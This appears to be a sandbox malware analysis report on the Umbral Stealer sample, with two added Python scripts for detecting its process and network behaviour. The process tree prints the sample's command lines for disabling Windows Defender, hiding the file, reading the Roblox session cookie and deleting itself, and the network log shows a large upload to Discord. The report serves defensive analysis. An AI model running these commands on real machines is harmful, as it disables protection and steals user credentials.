Analysis

  • max time kernel: 91s
  • max time network: 93s
  • platform: windows11-21h2_x64
  • resource: win11-20240802-en
  • resource tags: arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted: 05-08-2024 16:04 (day-month-year, i.e. 5 August 2024)

General

  • Target: Umbral.exe
  • Size: 496KB
  • MD5: 2989b8a064354c5fa729d713b84df30e
  • SHA1: a8f8065b500258e7b768c59f9c6f57932d4bcfa1
  • SHA256: bbdd54660f7cfee0d7ec0d5afa51900142c029ae48e71f8d4f834cac00b1761b
  • SHA512: 0d5b22d39dff8030755bb120c598aec238549100fb53c40468be7f6adb036867bf464fc9c71b204824f7042faa18cbb90ab199ce450844371b42b79c22fb3e94
  • SSDEEP: 12288:VoZtL+EP8jNMGxfEY3tmfh8ItWCw8ZOG:jI85MGxfEY3tmfh8ItDwaO

Malware Config

Signatures

  • Detect Umbral payload (1 IoC)
  • Umbral
    Umbral Stealer is an open-source modular stealer written in C#.
  • Credentials from Password Stores: Credentials from Web Browsers (1 TTP)
    Malicious access to, or copying of, a web browser credential store.
  • Command and Scripting Interpreter: PowerShell (1 TTP, 4 IoCs)
    Runs PowerShell to modify Windows Defender settings, e.g. adding exclusions for file extensions, paths and processes.
  • Drops file in Drivers directory (1 IoC)
  • Reads user/profile data of web browsers (2 TTPs)
    Infostealers often target stored browser data, which can include saved credentials and other sensitive data.
  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  • Looks up external IP address via web service (1 IoC)
    Uses a legitimate IP lookup service to find the infected system's external IP.
  • System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 2 IoCs)
    Adversaries may check for Internet connectivity on compromised systems.
  • Detects videocard installed (1 TTP, 1 IoC)
    Uses WMIC.exe to determine the installed video card.
  • Runs ping.exe (1 TTP, 1 IoC)
  • Suspicious behavior: EnumeratesProcesses (11 IoCs)
  • Suspicious use of AdjustPrivilegeToken (64 IoCs)
  • Suspicious use of WriteProcessMemory (26 IoCs)
  • Views/modifies file attributes (1 TTP, 1 IoC)

Processes

  • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2840
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1404
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      2⤵
      • Views/modifies file attributes
      PID:228
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3836
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1568
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1028
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3544
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      PID:2432
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      PID:2584
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:1444
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      2⤵
      • Detects videocard installed
      PID:4616
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:1076
      • C:\Windows\system32\PING.EXE
        ping localhost
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:4848
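The process tree above is, in effect, a list of child command lines a detection engineer can turn into rules over process-creation telemetry (Sysmon Event ID 1 or Security 4688): Defender tampering via Set-/Add-MpPreference, attrib +h +s on the sample's own path, the "ping localhost && del" self-delete, the .ROBLOSECURITY registry read, and the WMIC hardware queries. The script below is an added example, not part of the sandbox report or of Umbral itself: it encodes those behaviours as regex rules, groups hits by parent image (each child trips one rule, so the signal accumulates on the parent), and runs over constructed events whose command lines are copied from the tree plus a few benign ones. The event field layout, rule names, technique mappings, thresholds and the benign events are this example's assumptions.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Process-creation record; field names mirror Sysmon Event ID 1 (assumed layout)."""
    pid: int
    image: str
    cmdline: str
    parent_image: str


# (rule name, case-insensitive regex over the command line, ATT&CK technique).
# Rule names and technique mappings are this example's own, not the sandbox's signature names.
RULES = [
    ("defender_tamper",
     r"\b(Set|Add)-MpPreference\b.*(-Disable\w+\s+\$true|-Exclusion(Path|Process|Extension)"
     r"|-MAPSReporting\s+Disabled|-SubmitSamplesConsent)", "T1562.001"),
    ("attrib_hide_file", r'\battrib(\.exe)?"?\s+(\+[hs]\s+){1,2}', "T1564.001"),
    ("ping_then_del_self_delete", r"\bping\b[^&]*&&\s*del\b", "T1070.004"),
    ("roblox_session_cookie_read", r"RobloxStudioBrowser.*\.ROBLOSECURITY", "T1539"),
    ("wmic_hwid_query", r'\bwmic(\.exe)?"?\s+csproduct\s+get\s+uuid', "T1082"),
    ("wmic_videocard_query",
     r'\bwmic(\.exe)?"?\s+path\s+win32_videocontroller\s+get\s+name', "T1082"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE), tech) for name, pat, tech in RULES]


def match_rules(cmdline):
    """[(rule, technique)] for every rule whose pattern hits this command line."""
    return [(name, tech) for name, rx, tech in COMPILED if rx.search(cmdline)]


def scan(events):
    """Group hits by parent image: each child trips one rule, the parent accumulates them."""
    per_parent = defaultdict(lambda: {"rules": set(), "techniques": set(), "pids": []})
    for ev in events:
        hits = match_rules(ev.cmdline)
        if not hits:
            continue
        entry = per_parent[ev.parent_image]
        entry["pids"].append(ev.pid)
        for name, tech in hits:
            entry["rules"].add(name)
            entry["techniques"].add(tech)
    return dict(per_parent)


def flag_parents(summary, min_distinct_rules=3):
    """Parents whose children tripped at least min_distinct_rules different rules."""
    return sorted(p for p, e in summary.items() if len(e["rules"]) >= min_distinct_rules)


UMBRAL = r"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WMIC = r"C:\Windows\System32\Wbem\wmic.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed events: command lines copied from the sandbox process tree, plus three
# benign ones (parent explorer.exe) to show the rules stay quiet on ordinary admin use.
SAMPLE_EVENTS = [
    ProcEvent(1404, WMIC, '"wmic.exe" csproduct get uuid', UMBRAL),
    ProcEvent(228, r"C:\Windows\SYSTEM32\attrib.exe",
              r'"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"', UMBRAL),
    ProcEvent(3836, PS, '"powershell.exe" Add-MpPreference -ExclusionPath ' + "'" + UMBRAL + "'", UMBRAL),
    ProcEvent(1568, PS, '"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true '
              '-DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true '
              '-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force '
              '-MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference '
              '-SubmitSamplesConsent 2', UMBRAL),
    ProcEvent(2736, PS, r'"powershell.exe" Get-ItemPropertyValue -Path '
              r'HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY', UMBRAL),
    ProcEvent(3544, WMIC, '"wmic.exe" os get Caption', UMBRAL),
    ProcEvent(4616, WMIC, '"wmic" path win32_VideoController get name', UMBRAL),
    ProcEvent(1076, r"C:\Windows\SYSTEM32\cmd.exe",
              r'"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause',
              UMBRAL),
    ProcEvent(4848, r"C:\Windows\system32\PING.EXE", "ping localhost", r"C:\Windows\SYSTEM32\cmd.exe"),
    ProcEvent(5001, PS, '"powershell.exe" Get-MpPreference', EXPLORER),
    ProcEvent(5002, WMIC, '"wmic.exe" os get Caption', EXPLORER),
    ProcEvent(5003, r"C:\Windows\SYSTEM32\attrib.exe", '"attrib.exe" -r "C:\\Users\\Admin\\notes.txt"', EXPLORER),
]

if __name__ == "__main__":
    summary = scan(SAMPLE_EVENTS)
    for parent in flag_parents(summary):
        e = summary[parent]
        print(f"{parent}: {sorted(e['rules'])} ({', '.join(sorted(e['techniques']))}) pids={e['pids']}")
```

Grouping by parent is the point: a single Set-MpPreference or attrib call has benign uses, but one parent whose children trip five or six of these rules inside a few seconds is the stealer pattern this report shows. Note that the "wmic os get Caption" and "computersystem get totalphysicalmemory" lines are deliberately not rules; they are too common to be worth the false positives on their own.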

Network

  • DNS query: gstatic.com (Umbral.exe)
    Remote address: 8.8.8.8:53 (US)
    Request: gstatic.com IN A
    Response: gstatic.com IN A 172.217.23.195
  • DNS query: 8.8.8.8.in-addr.arpa (Umbral.exe)
    Remote address: 8.8.8.8:53 (US)
    Request: 8.8.8.8.in-addr.arpa IN PTR
    Response: 8.8.8.8.in-addr.arpa IN PTR dns.google
  • DNS query: ip-api.com (Umbral.exe)
    Remote address: 8.8.8.8:53 (US)
    Request: ip-api.com IN A
    Response: ip-api.com IN A 208.95.112.1
  • DNS query: 195.23.217.172.in-addr.arpa (Umbral.exe)
    Remote address: 8.8.8.8:53 (US)
    Request: 195.23.217.172.in-addr.arpa IN PTR
    Response: 195.23.217.172.in-addr.arpa IN PTR ams16s37-in-f3.1e100.net
              195.23.217.172.in-addr.arpa IN PTR prg03s05-in-f3.1e100.net
              195.23.217.172.in-addr.arpa IN PTR prg03s05-in-f195.1e100.net
  • DNS query: 1.112.95.208.in-addr.arpa (Umbral.exe)
    Remote address: 8.8.8.8:53 (US)
    Request: 1.112.95.208.in-addr.arpa IN PTR
    Response: 1.112.95.208.in-addr.arpa IN PTR ip-api.com
  • DNS query: discord.com (Umbral.exe)
    Remote address: 8.8.8.8:53 (US)
    Request: discord.com IN A
    Response: discord.com IN A 162.159.136.232
              discord.com IN A 162.159.137.232
              discord.com IN A 162.159.128.233
              discord.com IN A 162.159.138.232
              discord.com IN A 162.159.135.232
  • DNS query: 232.136.159.162.in-addr.arpa (Umbral.exe)
    Remote address: 8.8.8.8:53 (US)
    Request: 232.136.159.162.in-addr.arpa IN PTR
    Response: (no answer)
  • DNS query: nexusrules.officeapps.live.com (Umbral.exe)
    Remote address: 8.8.8.8:53 (US)
    Request: nexusrules.officeapps.live.com IN A
    Response: nexusrules.officeapps.live.com IN CNAME prod.nexusrules.live.com.akadns.net
              prod.nexusrules.live.com.akadns.net IN A 52.111.229.43
  • DNS query: 43.229.111.52.in-addr.arpa (Umbral.exe)
    Remote address: 8.8.8.8:53 (US)
    Request: 43.229.111.52.in-addr.arpa IN PTR
    Response: (no answer)
  • HTTP GET http://ip-api.com/line/?fields=hosting (Umbral.exe)
    Remote address: 208.95.112.1:80 (US)
    Request:
      GET /line/?fields=hosting HTTP/1.1
      Host: ip-api.com
      Connection: Keep-Alive
    Response:
      HTTP/1.1 200 OK
      Date: Mon, 05 Aug 2024 16:04:23 GMT
      Content-Type: text/plain; charset=utf-8
      Content-Length: 6
      Access-Control-Allow-Origin: *
      X-Ttl: 60
      X-Rl: 44
  • HTTP GET http://ip-api.com/json/?fields=225545 (Umbral.exe)
    Remote address: 208.95.112.1:80 (US)
    Request:
      GET /json/?fields=225545 HTTP/1.1
      Host: ip-api.com
    Response:
      HTTP/1.1 200 OK
      Date: Mon, 05 Aug 2024 16:04:26 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 161
      Access-Control-Allow-Origin: *
      X-Ttl: 60
      X-Rl: 44
  Connections (address, name, protocol, process, bytes sent / received, packets sent / received):

  • 172.217.23.195:443  gstatic.com  tls  Umbral.exe  803 B / 5.2kB  8 / 8
  • 208.95.112.1:80  http://ip-api.com/line/?fields=hosting  http  Umbral.exe  310 B / 267 B  5 / 2
    HTTP Request: GET http://ip-api.com/line/?fields=hosting
    HTTP Response: 200
  • 208.95.112.1:80  http://ip-api.com/json/?fields=225545  http  Umbral.exe  285 B / 470 B  5 / 3
    HTTP Request: GET http://ip-api.com/json/?fields=225545
    HTTP Response: 200
  • 162.159.136.232:443  discord.com  tls  Umbral.exe  519.1kB / 13.0kB  385 / 140
  • 8.8.8.8:53  gstatic.com  dns  Umbral.exe  602 B / 1.1kB  9 / 9
    DNS Request: gstatic.com
    DNS Response: 172.217.23.195
    DNS Request: 8.8.8.8.in-addr.arpa
    DNS Request: ip-api.com
    DNS Response: 208.95.112.1
    DNS Request: 195.23.217.172.in-addr.arpa
    DNS Request: 1.112.95.208.in-addr.arpa
    DNS Request: discord.com
    DNS Response: 162.159.136.232, 162.159.137.232, 162.159.128.233, 162.159.138.232, 162.159.135.232
    DNS Request: 232.136.159.162.in-addr.arpa
    DNS Request: nexusrules.officeapps.live.com
    DNS Response: 52.111.229.43
    DNS Request: 43.229.111.52.in-addr.arpa
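Two things in the connection summary above are worth automating on the network side. First, the sample's plaintext HTTP request to ip-api.com asks for only the `hosting` field (ip-api's "is this IP a hosting/data-center address" flag), which is a cheap VPS/sandbox test made before the second, fuller lookup with a numeric field mask. Second, the TLS session to discord.com sends roughly forty times more than it receives (519.1kB out, 13.0kB in), the shape of a webhook upload rather than a page load. The script below is an added example, not part of the report: it parses constructed flow rows in the summary's column order and tags both patterns. The row format, watch-lists, thresholds and tag names are this example's assumptions.

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit


@dataclass(frozen=True)
class Flow:
    dst: str        # "ip:port"
    name: str       # domain, or full URL for http rows
    proto: str      # "dns" | "http" | "tls"
    process: str
    sent: int       # bytes out of the sandbox
    received: int   # bytes into the sandbox
    pkts_out: int
    pkts_in: int


SIZE = {"B": 1, "kB": 1_000, "MB": 1_000_000}


def parse_size(text):
    """'519.1kB' -> 519100, '803 B' -> 803 (decimal units, as the report prints them)."""
    m = re.fullmatch(r"\s*([\d.]+)\s*(B|kB|MB)\s*", text)
    if not m:
        raise ValueError(f"unrecognised size: {text!r}")
    return int(round(float(m.group(1)) * SIZE[m.group(2)]))


def parse_flow(line):
    """One tab-separated row in the report's column order (format is this example's assumption)."""
    dst, name, proto, process, sent, recv, po, pi = (c.strip() for c in line.split("\t"))
    return Flow(dst, name, proto, process, parse_size(sent), parse_size(recv), int(po), int(pi))


def host_of(flow):
    return urlsplit(flow.name).hostname if "://" in flow.name else flow.name


# Assumed watch-lists; extend with the lookup and webhook services seen in your own telemetry.
IP_LOOKUP_HOSTS = {"ip-api.com"}
WEBHOOK_HOSTS = {"discord.com", "discordapp.com"}


def flags_for(flow, min_upload=100_000, min_ratio=10.0):
    """Tags for one flow: plaintext IP lookup (and the hosting-only variant used as a
    VPS/sandbox test), and upload-heavy TLS sessions to a service commonly abused for exfil."""
    tags = []
    host = host_of(flow)
    if flow.proto == "http" and host in IP_LOOKUP_HOSTS:
        tags.append("external_ip_lookup")
        fields = parse_qs(urlsplit(flow.name).query).get("fields", [])
        if any("hosting" in f.split(",") for f in fields):
            tags.append("sandbox_hosting_check")
    if (flow.proto == "tls" and host in WEBHOOK_HOSTS
            and flow.sent >= min_upload and flow.sent >= min_ratio * max(flow.received, 1)):
        tags.append("upload_heavy_session_to_webhook_host")
    return tags


def triage(rows):
    """[(dst, host, tags)] for each summary row, in input order."""
    out = []
    for line in rows:
        f = parse_flow(line)
        out.append((f.dst, host_of(f), flags_for(f)))
    return out


# Constructed rows; the values are taken from the report's connection summary.
SAMPLE_ROWS = [
    "172.217.23.195:443\tgstatic.com\ttls\tUmbral.exe\t803 B\t5.2kB\t8\t8",
    "208.95.112.1:80\thttp://ip-api.com/line/?fields=hosting\thttp\tUmbral.exe\t310 B\t267 B\t5\t2",
    "208.95.112.1:80\thttp://ip-api.com/json/?fields=225545\thttp\tUmbral.exe\t285 B\t470 B\t5\t3",
    "162.159.136.232:443\tdiscord.com\ttls\tUmbral.exe\t519.1kB\t13.0kB\t385\t140",
    "8.8.8.8:53\tgstatic.com\tdns\tUmbral.exe\t602 B\t1.1kB\t9\t9",
]

if __name__ == "__main__":
    for dst, host, tags in triage(SAMPLE_ROWS):
        print(f"{dst:22} {host:14} {', '.join(tags) or '-'}")
```

The upload-ratio rule needs both an absolute floor and a ratio: a bare ratio fires on every small request/response pair, and a bare byte count fires on ordinary downloads. The hosting check is the more specific indicator; on a real host the answer is usually "false" and the stealer proceeds, so the request itself, not its answer, is what you alert on.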

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (2KB)
    MD5: 627073ee3ca9676911bee35548eff2b8
    SHA1: 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
    SHA256: 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
    SHA512: 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (944B)
    MD5: 1a9fa92a4f2e2ec9e244d43a6a4f8fb9
    SHA1: 9910190edfaccece1dfcc1d92e357772f5dae8f7
    SHA256: 0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
    SHA512: 5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (948B)
    MD5: 6aa2fca4712a213a6961a9b42cedaadb
    SHA1: 81da2cba9f21527a1ee07596d0a5a8c11c27ec84
    SHA256: 818ba8689d5e1508fbd0f1183ec4cd7b920236975243b5c8a7c69ae1ce06a6b8
    SHA512: 69f5a0fe0a020f027bcf16e30735e2e7983b4ba89360304ff05a2bb6c375b186730f575e0ba2fde6c5f3d95d256ec70a42cca62bcfa0e9c7a263b207c9c183e8
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (1KB)
    MD5: 7332074ae2b01262736b6fbd9e100dac
    SHA1: 22f992165065107cc9417fa4117240d84414a13c
    SHA256: baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa
    SHA512: 4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (1KB)
    MD5: e8ad350bb24c7ab38efd0ef0553239c7
    SHA1: 887c19e4c11de19854458e26a1ed05b67a75bf29
    SHA256: 5cf85b38cbbf1a064a4f8001a0ec031993d44e46b8e65d713785c84916cb8ffd
    SHA512: 74fef147e98b8b576712c212174a7793deb619d54c7ac7956e38ed4e09202f0c93ae4ec9e89cd4d0ac79c481d30c5c3fc5a3d042537c74d7bffda1f8453aef6e
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bgwexpr1.oaa.ps1 (60B)
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  Memory dumps (memory/<pid>-<index>-<start>-<end>-memory.dmp, ordered by PID and index):

  • memory/2840-0-0x0000023515DB0000-0x0000023515E32000-memory.dmp (520KB)
  • memory/2840-1-0x00007FFBA39D3000-0x00007FFBA39D5000-memory.dmp (8KB)
  • memory/2840-2-0x00007FFBA39D0000-0x00007FFBA4492000-memory.dmp (10.8MB)
  • memory/2840-31-0x00000235305C0000-0x0000023530636000-memory.dmp (472KB)
  • memory/2840-32-0x0000023530570000-0x00000235305C0000-memory.dmp (320KB)
  • memory/2840-33-0x0000023530540000-0x000002353055E000-memory.dmp (120KB)
  • memory/2840-67-0x0000023530650000-0x000002353065A000-memory.dmp (40KB)
  • memory/2840-68-0x0000023530680000-0x0000023530692000-memory.dmp (72KB)
  • memory/2840-85-0x00007FFBA39D0000-0x00007FFBA4492000-memory.dmp (10.8MB)
  • memory/3836-8-0x000001E7B90E0000-0x000001E7B9102000-memory.dmp (136KB)
  • memory/3836-12-0x00007FFBA39D0000-0x00007FFBA4492000-memory.dmp (10.8MB)
  • memory/3836-13-0x00007FFBA39D0000-0x00007FFBA4492000-memory.dmp (10.8MB)
  • memory/3836-14-0x00007FFBA39D0000-0x00007FFBA4492000-memory.dmp (10.8MB)
  • memory/3836-17-0x00007FFBA39D0000-0x00007FFBA4492000-memory.dmp (10.8MB)
